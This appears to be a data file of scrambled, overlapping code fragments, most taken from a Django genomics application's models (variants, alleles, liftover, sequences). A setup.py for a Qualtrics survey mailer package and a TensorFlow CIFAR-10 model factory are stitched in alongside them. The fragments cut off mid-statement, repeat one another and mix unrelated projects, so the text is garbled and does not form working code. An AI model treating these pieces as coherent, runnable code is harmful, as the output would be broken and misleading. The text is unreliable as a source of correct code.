"from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from",
"null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one, otherwise",
"on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build",
"RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status",
"models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self):",
"- has to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple",
"try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with",
"VCF (in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user",
"return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool:",
"at a locus Usually 2+ per line in a VCF file (ref +",
"by to write VCF coordinates during liftover. Can be slow (API call) If",
"allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build =",
"return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\"",
"VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs =",
"format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt",
"allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\")",
"= [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) ->",
"is set to Allele.pk and then creating VariantAllele entries for the variant/allele Some",
"for a small fraction of Variants So don't want them on the Variant",
"self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self)",
"django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from",
"def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c",
"\"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1,",
"there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy",
"class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome build",
"other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists",
"= models.TextField() class Meta: unique_together = ('liftover', 'allele') def __str__(self): return f\"{self.allele} failed",
"alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom):",
"and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT",
"= collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee",
"user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele",
"@property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self]",
"in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return",
"AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE)",
"can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return",
"constraints) Postgres by default uses indexes for constraints, and large TextFields give error",
"= \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build}",
"locus Usually 2+ per line in a VCF file (ref + >= 1",
"@property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) ->",
"flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of",
"start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def",
"VCF where ID is set to Allele.pk and then creating VariantAllele entries for",
"other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe)",
"va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError:",
"canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error:",
"= None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self):",
"# locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool:",
"using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod",
"shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in",
"models, IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import",
"variant in allele {self.id} for build {genome_build}') if not va: va = vas.first()",
"== '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def",
"{name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod",
"= va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']:",
"= Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise",
"self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection",
"kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error =",
"pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self):",
"created - allele_source used to retrieve them The VCF (in genome_build build) is",
"down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele}",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom",
"if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False})",
"set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs:",
"as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField",
"to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va",
"bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def",
"va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not",
"cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position",
"def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if",
"= qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return",
"only 1 Variant for a given locus/alt per database (handled via insertion queues)",
"to resolve to the same allele (due to our normalization not being the",
"clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error",
"the desired genome build For others (NCBI Remap) we need to write the",
"va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try:",
"Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q():",
"but it's not likely. It's a bug to have the same 3 variant/build/allele",
"and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT",
"at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build,",
"ref == alt or alt == '.' @property def is_reference(self) -> bool: return",
"def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in",
"return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs",
"- usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL =",
"from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from",
"Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav",
"self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) ->",
"self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele,",
"a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\"",
"return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs",
"insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence,",
"= f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge",
"return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the",
"is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\"",
"partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles",
"def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property def",
"library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types",
"= cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self): return",
"genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User,",
"\"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())}",
"chrom, position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position,",
"(so Locus/Variant can have unique constraints) Postgres by default uses indexes for constraints,",
"status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition",
"contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT)",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build",
"if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various",
"VCF coordinates during liftover. Can be slow (API call) If you know a",
"there, and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele",
"self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return",
"FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for",
"ClinGen Allele (may not have been possible to retrieve in all builds, but",
"return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try:",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return",
"def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels.",
"build being represented by 1 loci in the build being used by ClinGen)",
"sequence is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should",
"def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection =",
"= models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together",
"on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)",
"flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\"",
"if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no",
"to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE)",
"def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\"))",
"def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property",
"class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple",
"def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self)",
"VCF file (ref + >= 1 alts pointing to the same locus for",
"-> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string",
"def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this allele",
"ie GRCh37 and GRCh38 variants for same change point to same allele This",
"1 loci in the build being used by ClinGen) - but it's not",
"Only works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return",
"allele if there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\":",
"= None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection)",
"get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and variant.start <=",
"V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from",
"= VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild,",
"= models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild,",
"genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs",
"= models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set",
"by 1 loci in the build being used by ClinGen) - but it's",
"= other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing",
"Remap) we need to write the source genome build VCF first Alleles must",
"models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return",
"!= SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model):",
"= models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self)",
"that. Another possible solution is to use Gist indexes but that requires installing",
"genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig,",
"-> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:",
"c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property",
"if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have been",
"alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple",
"This is called at the end of a liftover pipeline (once per build)",
"The easiest solution is to md5sum seq and make the constraint on that.",
"unique_together constraint We only expect to store Alleles for a small fraction of",
"if self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return",
"another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if",
"name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec ==",
"if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref,",
"\"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs =",
"kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return",
"-> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy",
"QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build:",
"= Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str]",
"seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False,",
"va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles at",
"m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt",
"to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\")",
"for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if",
"{source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele,",
"if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos,",
"on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True)",
"AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN",
"has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq =",
"@property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\"",
"being used by ClinGen) - but it's not likely. It's a bug to",
"liftover_complete: If False does not check for missing representations \"\"\" if liftover_complete: v37",
"destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def",
"locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus =",
"= None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool =",
"abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string:",
"try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant',",
"if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both",
"fraction of Variants So don't want them on the Variant object - instead",
"return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually",
"return ref == alt or alt == '.' @property def is_reference(self) -> bool:",
"== 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def",
"Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' },",
"and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\",",
"\"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end):",
"return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a VCF"
] |
[
"pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language",
"classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas',",
"Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python ::",
"<filename>setup.py from setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built",
"author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer'",
"from setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys",
"Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ], zip_safe=False )",
"package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT',",
"'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests'",
"description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>',",
"surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language ::",
":: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ], zip_safe=False",
"setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey',",
"distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming",
"in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python",
"url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[",
"setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics",
"setuptools import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in",
"Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[ 'pandas', 'requests' ],",
"for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[",
"license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ], install_requires=[",
"author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ], packages=[ 'qualtrics_mailer' ],",
"survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6' ],",
"import setup setup( name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics',",
"name='qualtrics_mailer', version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer',",
"version='0.1', description='A package for distributing pre-built surveys in Qualtrics', keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>',",
"keywords='qualtrics survey', url='http://github.com/kaianalytics/qualtrics_mailer', author='<NAME>', author_email='<EMAIL>', license='MIT', classifiers=[ 'Programming Language :: Python :: 3.6'"
] |
[
".preact_resnet import * from .densenet import * from .dpn import * from .dla",
"= { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext': ResNext20_4x16d, 'densenet': DenseNet57, 'dpn':",
"import * from .dpn import * from .dla import * from .senet import",
"from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11,",
"create_model(model_name, initializer, weight_decay): model_dict = { 'vgg': VGG11, 'resnet': ResNet56, 'preact_resnet': PreactResNet56, 'resnext':",
"tensorflow as tf from .vgg import * from .resnet import * from .resnext",
"<reponame>respect5716/Tensorflow_Cifar10<gh_stars>0 import tensorflow as tf from .vgg import * from .resnet import *",
"'senet': SENet26, 'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer,",
"import * from .senet import * def create_model(model_name, initializer, weight_decay): model_dict = {",
"'dla': DLA, } regularizer = tf.keras.regularizers.l2(weight_decay) kwargs = { 'kernel_initializer': initializer, 'kernel_regularizer': regularizer,",
